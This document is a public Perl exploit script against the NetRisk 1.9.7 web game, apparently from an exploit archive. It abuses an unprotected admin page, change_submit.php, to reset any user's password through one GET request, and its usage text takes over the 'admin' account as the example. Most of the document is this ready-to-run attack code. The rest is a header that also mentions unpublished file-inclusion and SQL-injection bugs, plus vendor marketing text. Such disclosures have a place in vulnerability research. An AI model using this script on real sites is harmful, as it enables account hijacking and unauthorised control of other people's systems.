================================================================
NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit
================================================================
#!/usr/bin/perl
#=========================================================================================================================#
# _ ____ _ _ _ _ #
# __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ #
# / _/ _ \/ _` ||_ \ '_|_ / _ | ' \/ -_) | / _ \ V V / -_) '_ \ _ / -_) || | #
# \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_| #
#=========================================================================================================================#
# Author: Cod3rZ # #
#=========================================================================================================================#
# Status: Public #
#=========================================================================================================================#
# Board: NetRisk 1.9.7 #
# Download: http://phprisk.org/netrisk_1.9.7.zip #
#=========================================================================================================================#
# Vuln Type: Remote Password Change [Exploit] #
# Severity: Highest #
#=========================================================================================================================#
# The ACP haven't control and we can change the password of the other users #
#=========================================================================================================================#
# http://[site]/admin/change_submit.php?username=[user]&new_pass=[newpass] #
#=========================================================================================================================#
# NetRisk contains a lot of bugs: RFI, SQL Injection, ecc; but this is the highest vuln and i wouldn't post those #
#=========================================================================================================================#
use LWP::UserAgent;
use HTTP::Request::Common;
$lwp = new LWP::UserAgent;
system('cls');
$site = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
print q{ ---------------------------------------------------------------------
:: NetRisk 1.9.7 Remote Password Change Exploit ::
---------------------------------------------------------------------
Author : Cod3rZ
Email : [email protected]
Site : http://cod3rz.helloweb.eu
---------------------------------------------------------------------};
if(!$site || !$user || !$pass)
{
print q{
Usage: perl netrisk.pl [site] [user] [newpass]
Usage: perl netrisk.pl site.com/netrisk admin 123456
---------------------------------------------------------------------};
system('exit');
}
else {
print "
Site: $site
User: $user
Pass: $pass
---------------------------------------------------------------------
Waiting...
---------------------------------------------------------------------";
$connect = $lwp->request(GET $site."/admin/change_submit.php?username=".$user."&new_pass=".$pass);
$content = $connect->content;
if($content =~ /username->/) {
print "
Password Changed
---------------------------------------------------------------------"; }
else { print "
Error
---------------------------------------------------------------------"; }
}
# 0day.today [2018-01-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation